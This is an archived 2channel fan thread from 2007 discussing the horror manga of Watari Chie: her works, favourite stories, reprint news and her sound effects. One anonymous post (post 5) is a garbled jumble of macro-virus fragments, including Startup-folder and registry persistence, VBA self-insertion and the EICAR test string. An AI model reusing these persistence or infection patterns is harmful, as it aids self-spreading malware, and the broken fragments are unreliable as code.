2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆渡 千枝◆

1 :花と名無しさん:2007/10/29(月) 00:01:30 ID:c3ZtU6RJ0
スレッドが無かったので立てました
渡千枝さんの 作品について語りましょう

作品
・幽霊たちの舞踏会/1985
・死霊の贈りもの/1986
・闇からの招待状/1987
・わたしが消えた/鬼神の棲む家/1988
・異次元からの便り/1989
・手-怪奇迷宮/ハロウィーン伝説/1990
・人狼伝説/1991
・幻の9階/死霊の花嫁/1993
・歪んだ騎士/1994
・寄生虫/鈴蘭-忌まわしき侵入者/1995
・幽霊学校/死の砂迷宮/1997
・FUTURE/1998
・鈴蘭は血の匂い/1999
・怨霊伝説/2000
・放課後の怪談 1 死者との交信/2 花いちもんめ/2001
・子抱き観音/2002
・ラ・カンパネラ-鐘楼-/2003

2 :花と名無しさん:2007/10/29(月) 00:09:30 ID:???0
ttp://books.yahoo.co.jp/book_search/author?author=%C5%CF%C0%E9%BB%DE&view=1&sort=1&sortorder=1

3 :花と名無しさん:2007/10/29(月) 00:10:39 ID:???0
デジタルコミック
ttp://comics.yahoo.co.jp/list/author/auth_watariti01.html

4 :花と名無しさん:2007/10/29(月) 00:13:46 ID:c3ZtU6RJ0
〜伝説シリーズ?が好きだった。
不動 王仁彦のやつ。

5 :花と名無しさん:2007/10/29(月) 00:15:42 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/10/29(月) 14:36:53 ID:???0
スレ一覧を眺めてて笑った、単独で立つなんて。

最近のではホラーM2007年04月号の「死への扉」が一番好きです。
ホラーじゃなくサスペンス要素の強い作品だったけど完成度が高かった。


ホラーMコミックスで作品集の続きが出たらいいですね。
「鈴蘭」の未収録話とか入れてほしいな。

7 :1さん:2007/10/31(水) 18:03:15 ID:ch8RNxZE0
あちゃー 過疎ってますねw
ageてみよう

>>6
今もちゃんと描いてるんですねぇ
最近漫画からはめっきり離れてしまったので
渡さんが今も連載とかしてるのか、とか
全く知らなかったんですけど


「わたしが消えた」とか「幽霊たちの舞踏会」みたいな
悪夢のような出来事がやっと終わった‥と思ってホッとしたら
終わってなかった、みたいなのが
結構怖い((;´д`))

8 :1さん:2007/11/01(木) 21:49:15 ID:sOpIMAGt0
めげずに書き込み!

幻の9階だっけかなぁ?
渡さんの漫画でエロシーンが出てきて驚いたw
これも時代の流れなんですかねー
渡さんの作品にはエロはいらないと思うんだけどなぁ

9 :花と名無しさん:2007/11/02(金) 01:36:15 ID:???0
わ〜懐かしい!!
昔から好きでコミックスちまちま買ってるよ。
花嫁人形のが怖かったな。

>>4
王仁彦シリーズ自分も好きだったよ。
もう描かないのかな。
とある一家に代々伝えられる残酷絵の話が面白かった。

10 :花と名無しさん:2007/11/02(金) 21:57:21 ID:???0
私は、「午前二時のデッドゾーン」だっけ?あれがすき。
復讐する側にも手痛いしっぺ返しが待ってるところが。
まさに人を呪わば穴二つ。

11 :1さん:2007/11/03(土) 19:53:35 ID:VXrBZBQA0
漫画板では1がレスするスレなんていらないと思うんですが
もうちょっとレスが伸びるまでは1さんのまま
留まろうと思いますw

>>9
私もちまちま買ってますw

掛け軸のやつですね、掛け軸の絵になぞらえて殺されるやつ
懐かしいなぁ
‥漫画どこにしまったっけ?読みたくなっちゃったなぁ

>>10
鏡に自分のシヌ場面が写るやつですね!
あれ読んだあと、夜中鏡見るのがちょっと怖くなったw

12 :1さん:2007/11/03(土) 19:58:10 ID:???0
最近部屋の片付けをしていて漫画が出てきて
つい読んで懐かしくなり、スレを立てたんですが

"死霊の贈りもの"に収録されている
"二人だけのイエスタデイ"が結構いい
渡さんの漫画にしては、それほどおどろおどろしくないし!

13 :花と名無しさん:2007/11/03(土) 20:05:55 ID:???0
渡千枝好きだけど身近にあると怖いので
コミックスは全部箱に入れて押し入れの奥に隠してます。

何年か一度引っ張り出して読むんだけど
やっぱり怖くて読まなきゃ良かったと思ってまた隠します。

14 :花と名無しさん:2007/11/07(水) 12:34:05 ID:???0
文庫化情報キター

15 :花と名無しさん:2007/11/07(水) 14:21:57 ID:???0
ホラーMの読者コーナーで新刊情報知った。

「鈴蘭」の文庫未収録話
「夜叉の杜」
「死への扉」
「パラレル・ライフ」

あたりが入ってたら嬉しいな。
関よしみスレのように担当者様がここを見ているのを期待して。

16 :1さん:2007/11/09(金) 23:18:09 ID:DPztmeIF0
>>13
隠したくなる気持ちなんとなく分かるw

漫画読んでて、恐いページ開くと
後で肩というか背中というか、
パッパッて払いたくなる感じ・・・(;´Д`)

>>14
まじですかーっ

>>15
それって文庫ですよね?
一度文庫デビューしてみようかな〜

17 :1さん:2007/11/09(金) 23:22:28 ID:DPztmeIF0
王仁彦の話しなんですが
普段ぬぼ〜〜っとしてるくせに
ピンチになるとキリッとしてかっこよくなるのって
ありきたりだけれどずるいw

最初から普通にかっこいいひとより
2倍も3倍もかっこよく見えてしまうんだろうなぁw

18 :花と名無しさん:2007/11/10(土) 01:13:46 ID:???0
「めがね色の恋わずらい」って単行本持ってた(今でも実家にあるかも)
その頃は普通の少女漫画だったんだけど…いつの間にホラーの人になってたのか…。

19 :1さん:2007/11/15(木) 21:49:49 ID:YqR6DVqc0
>>18
普通の少女漫画!見てみたいー!

でも今ノリノリでホラー描いているとこをみると
本人はホラーが好きで描きたかったんだけど、
最初は編集部の指示で少女漫画を描いていた‥
って感じですかね〜

20 :1さん:2007/11/15(木) 21:54:01 ID:YqR6DVqc0
昔1さんは、渡さんの漫画で
ある特徴に気付きました
効果音、例えば扉が勢いよく閉まる音

バタン!

これが渡さんの漫画だと

バタ・・・ン!

不気味さを表したいのでしょうか、
ほぼ確実に"・・・"が入るのです

この事に気付いて、姉に話して
『バタン!でいいじゃんねw』と笑ったものです

21 :花と名無しさん:2007/11/22(木) 07:24:29 ID:???O
20しかないレスの中に‘1さん’と言うレスばかり目立って、ドン引き…('A`)
本当に1の自演?つか、自分にさん付けって…pgr

22 :花と名無しさん:2007/11/22(木) 17:33:19 ID:???0
1さん応援してます。>>21はスルーで!

23 :花と名無しさん:2007/11/22(木) 19:45:33 ID:???0
傑作集の第02巻は「ゆがんだ騎士」がベースなんですね。

渡千枝キャラは萌えとかには無縁だけど
あの主人公の黒ストッキング(タイツ)だけはかなりツボに入って
いまでも印象深い。

24 :花と名無しさん:2007/11/23(金) 12:56:18 ID:???0
支援揚げ

25 :花と名無しさん:2007/11/24(土) 02:44:46 ID:???0
1さんガンバ!!

26 :1さん:2007/11/25(日) 23:04:36 ID:SaqA0/rc0
>>22
どうもありがとうです!(^o^)ノ

>>23
黒ストッキング‥そういうキャラいましたっけ??
見てみないとなー!

>>24
ありがとうです!(^o^)ノ

>>25
はいー!頑張ります!ありがとう〜(^o^)ノ

27 :1さん:2007/11/25(日) 23:18:50 ID:SaqA0/rc0
あぁ〜〜忙しくてなかなか書き込みできない1さんです
本屋さんにも、行きたくても行けません‥
渡さんの漫画で読んでないのがあったら
買って読みたいのになぁ

あ、今急に幽霊船のお話を思い出した
ラストが良かった
年を重ねた主人公が、当時のままの
実習船と実習生に遭遇して
敬礼する場面

他の漫画だと、主人公が年をとった姿まで描くって
あんまりないんだけども
渡さんの漫画だとよく出てくるんだよなー
女子高生だったヒロインがお婆さんになってまで出てきたり‥
とても時間の経過を感じるのが、渡さんの作品ですなw

28 :花と名無しさん:2007/11/26(月) 03:45:33 ID:???0
作家名のみで検索してたら、思わぬモノが出てきたw

秋田書店の雑誌目次みたいなページ(マガジンBOX)
・サスペリアミステリー 「午前ニ時のデッドゾーン」82p 掲載の号
ttp://www.akitashoten.co.jp/CGI/autoup/syousaiput.cgi?id=186
・夏に読みたい怖い話 「ラスト・メッセージ」60p 掲載の号
ttp://www.akitashoten.co.jp/CGI/autoup/syousaiput.cgi?id=1259

29 :花と名無しさん:2007/12/03(月) 14:26:21 ID:JP+b/9Xl0
タンスの裏に上半身だけの怖い絵が書いてある話がおそろしかった
あの絵の怖さだけでも、ホラーセンス抜群って感じ

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)